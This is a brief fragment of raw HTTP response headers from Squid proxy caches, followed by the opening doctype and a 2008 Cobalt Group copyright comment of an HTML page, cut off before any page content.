X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend01-1
X-Cache-Lookup: MISS from backend01-1:4001
X-Cache: MISS from frontend01
X-Cache-Lookup: MISS from frontend01:3128
Via: 1.0 backend01-1 (squid), 1.0 frontend01 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<!-- Copyright 2008, The Cobalt Group, Inc. All rights reserved. -->